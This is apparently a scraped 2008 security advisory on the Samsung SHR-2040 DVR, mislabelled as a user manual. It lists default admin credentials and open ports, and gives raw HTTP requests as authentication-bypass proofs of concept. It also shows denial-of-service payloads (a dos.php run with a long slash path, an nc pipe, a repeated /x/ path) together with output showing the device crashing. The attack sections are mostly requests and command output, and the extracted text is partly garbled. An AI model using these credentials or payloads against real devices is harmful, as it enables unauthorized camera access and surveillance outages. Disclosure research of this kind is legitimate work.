Samsung SHR 2040 User manual

An Insecurity Overview of the Samsung DVR SHR-2040 An Insecurity Overview of the Samsung DVR SHR-2040 by Alex Hernandez Date: 04.12.007 01:03:00 am Reléase: 05.09.008 06:37:00 am By Alex Hernandez a h e r n a n d e z at s y b s e c u r i t y d o t c o m Very special thanks to: str0ke (milw0rm.com) kf (digitalmunition.com) Rathaus (beyondsecurity.com) !dSR (segfault.es) 0dd (0dd.com) and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, pikah, codebreak, h3llfyr3, canit0 Page 1 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 --==+=============================================+==---==+ Technical details and Attacks +==---==+=============================================+==---==+===================+==---==+ Digital Video Recorders +==---==+===================+==-DVRs are basically mini-PCs that allow a user to record TV broadcasts in a digital form via cable or DirectTV transmissions (depending on the model), in digital form on a hard drive located inside the recorder. This allows for The device is allowed to access the company’s server, which regularly downloads the program guides into the DVR via a modem. Thius DVRs provides the same recording and time-shifting functions as a VCR, just in a different medium. --==+========================+==---==+ DVR Operating System Details +==---==+========================+==-Software Version Broadcast Format Mac Address B3.03E-K1.53-V2.19_0705281908 NTSC 00:16:6C:22:0F:72 version: authority: ddns: mac: model_name: protocol_version: B3.03E-K1.53-V2.19_0705281908 1203961644-01-03 samsung 00-16-6C-22-0F-72 SHR-2040 V1.0 --==+==================+==---==+ Login and User details +==---==+==================+==-Using the Smart Viewer u: ADMIN p: 4321 u: USER p: 4321 --==+===============+==---==+ System Operation +==---==+===============+==-● Turn the power on and the following LOGO pops up on the screen. ● After the LOGO appears, all of LED in the front flickers 6 times to initialize the system for operation. ● Upon completion of normal initialization, the Live screen appears accompanying a beep sound. ● It requires 30 to 40 seconds until the Live screen appears Page 2 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 --==+===================+==---==+ System Operation cont. +==---==+===================+==-Before Use ● Selection - The yellow cursor shows the current window. Use the key in the front to move the cursor on your desirous menu. If you press the “Enter” key with the cursor clicking on your desirable menu, the system will enter the new mode. Press the “Enter” key to finish the selection. On seeing Drop Down Menu key to move the cursor on your desirable menu. ● “OK” or “Cancel” in Menu Setup Window Once changed, the new menu setup procedure will be finalized by pressing “OK”. Pressing “Cancel” will cancel the new setup and return to the upper menu. ● Front “MENU” and “SEARCH” Button The MENU button or SEARCH button, if pressed first, acts as an entrance button. Once entering, it reverses the page to the previous one. ● The “>” or “V” mark beside the title copies the line in the arrow direction to the value of the first line. ● The first page of the menu is structured as follows. Page 3 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 The figure 2.1 depicts the basic setup of an analog camera system and a network-based or the figure 2.2 depicts the basic setup of the IP camera system. In the traditional analog CCTV application, security cameras capture an analog video signal and transfer that signal over coax cable to the Digital Video Recorder (DVR). Figure 2.1 Analog System Figure 2.2 IP System Page 4 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 --==+============================+==---==+ The Smart Viewer 2.0 for Pro DVR +==---==+============================+==-- Smart Viewer is a program that a general PC user is able to install SHR-2040/2041/2042 to his PC to monitor the video and audio data in the real time through network without going to the site where SHR-2040/2041/2042 is installed. ● Thanks to the transmission of video data compressed by the MPEG-4 Video Compression method, it can play the video images of good quality. ● Thanks to the G.726 Voice Compression method, it supplies the voice data of good quality. Use of armored MIC improves the quality of remote voice. ● Thanks to the transmission of video/audio stream through RTP(Real-Time Transport Protocol), the real-time video playback is excellent and multi-users’ simultaneous connection does not affect the transmission speed in whole abruptly. ● Command & Control by RTSP(Real-Time Streaming Protocol) enables safety. control through the network. Page 5 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 --==+===============+==---==+ Port and Services +==---==+===============+==-PORT STATE SERVICE 554/tcp 555/tcp 556/tcp 557/tcp open open open open rtsp dsf remotefs openvms-sysipc MAC Address: 00:16:6C:22:0F:72 (Samsung Electonics Digital Video System Division) --==+===============================+==---==+ The threat Over the network corporate +==---==+===============================+==-GET /content_frame.htm?cgiName=system_disk&lang=en HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, */* Referer: http://$1$9hC8DmrL$8NG8i3pQXBabAKo.AIm8U.:[email protected]:557/cgibin/left_menu?lang=en&topMenu=0 Accept-Language: en-us UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 10.50.10.248:557 Connection: Keep-Alive Authorization: Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ== HTTP/1.1 200 OK Date: Sun Dec 9 23:51:37 2007 Server: GoAhead-Webs Pragma: no-cache Cache-Control: no-cache Content-length: 1561 Content-type: text/html <html> <head> <meta http-equiv="Pragma" CONTENT="No-Cache"> <title>System Setup</title> <SCRIPT language="JavaScript" src="htmlCommon.js"></script> </head> <SCRIPT language="JavaScript"> document.write("<frameset rows='286,*' cols='*' frameborder='NO' border='0' framespacing='0'>"); //mainframe.. CGI ...... , lang.... ........ .... CGI.. ......... document.write(" <frame src='/cgi-bin/"+_cgiName+"?lang="+_lang+"' name='mainFrame' scrolling='auto' noresize >"); // leftmenu.... CGI ...... system_info.... bottom.... apply, cancel ...... .... ...... // bottomFrame.. info_bottom.htm ...... ........ ..... if(_cgiName == "system_info"){./* no button */ .document.write(" <frame src='info_bottom.htm?lang="+_lang+"' name='bottomFrame' scrolling='NO' noresize>"); }else if(_cgiName == "sched_rec" || _cgiName == "sched_alarm"){./* add holiday button */ Page 6 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 .document.write(" <frame src='bottom_sched.htm?lang="+_lang+"' name='bottomFrame' scrolling='NO' noresize>"); } --==+===========================+==---==+ The Basic Authentication PoC (1) +==---==+===========================+==-GET /first.htm HTTP/1.1 Accept: */* Referer: 10.50.10.248 Accept-Language: en-us UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 10.50.10.248:557 Connection: Keep-Alive Authorization: Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==</h1></body> Page 7 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 --==+===========================+==---==+ The Basic Authentication PoC (2) +==---==+===========================+==-GET /first.htm HTTP/1.1 Accept: */* Referer: 10.50.10.248 Accept-Language: en-us UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 10.50.10.248:557 Connection: Keep-Alive Authorization: Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==</h1></body> Page 8 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 --==+===========================+==---==+ The Basic Authentication PoC (3) +==---==+===========================+==-GET /index_menu.htm?lang=en&topMenu=5 HTTP/1.1 Accept: */* Referer: 10.50.10.248 Accept-Language: en-us UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 10.50.10.248:557 Connection: Keep-Alive Authorization: Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==</h1></body> Page 9 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 --==+===========================+==---==+ The Basic Authentication PoC (4) +==---==+===========================+==-GET /index_menu.htm?lang=en&topMenu=5 HTTP/1.1 Accept: */* Referer: 10.50.10.248 Accept-Language: en-us UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 10.50.10.248:557 Connection: Keep-Alive Authorization: Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==</h1></body> --==+================================+==---==+ Denial of service attack port (TCP 554) +==---==+================================+==-A denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the motives for a DoS attack may vary, it generally comprises the concerted, malevolent efforts of a person(s) to prevent an Internet site or service from functioning temporarily or indefinitely. C:\>nc -vvn 10.50.10.248 554 (UNKNOWN) [10.50.10.248] 554 (?) open nice open port without problem Page 10 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 --==+=========================+==---==+ Denial of service attack PoC (4) +==---==+=========================+==-GET / HTTP/1.1 Accept: */* Referer: 10.50.10.248 Accept-Language: en-us UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 10.50.10.248:554 Connection: Keep-Alive Authorization: Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==</h1></body> ----------------------------------------------------------------------------Usage: dos.php "host" "/path/" "times" host: path: times: target server (ip or hostname) path of the file, including file and extension. number of times to "download" the file. Page 11 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 C:\ >php -f dos.php "10.50.10.248" "/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////////////" 100 crashed!!! C:\>nc -vvn 10.50.10.248 554 (UNKNOWN) [10.50.10.248] 554 (?): connection refused sent 0, rcvd 0: NOTSOCK Successful Denial of Service attack --==+================================+==---==+ Denial of service attack port (TCP 557) +==---==+================================+==-A denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the motives for a DoS attack may vary, it generally comprises the concerted, malevolent efforts of a person(s) to prevent an Internet site or service from functioning temporarily or indefinitely. $ cat dos.txt | nc -vvn 10.50.10.248 557 (UNKNOWN) [10.50.10.248] 557 (?) open Page 12 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 --==+==========================+==---==+ Denial of service attack PoC (5) +==---==+==========================+==-GET /x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x//x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x /x/x/x/x/x/ HTTP/1.1 Accept: */* Referer: http://$1$9hC8DmrL$8NG8i3pQXBabAKo.AIm8U.:[email protected]:557 Accept-Language: en-us UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 10.50.10.248:557 Connection: Keep-Alive Authorization: Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ== Page 13 of 14 An Insecurity Overview of the Samsung DVR SHR-2040 alt3kx labs © Neurowork™ 2008. All Rights Reserved. SYB Security is a business unit of Neurowork™ Page 14 of 14
* Your assessment is very important for improving the work of artificial intelligence, which forms the content of this project
Related manuals
Download PDF
advertisement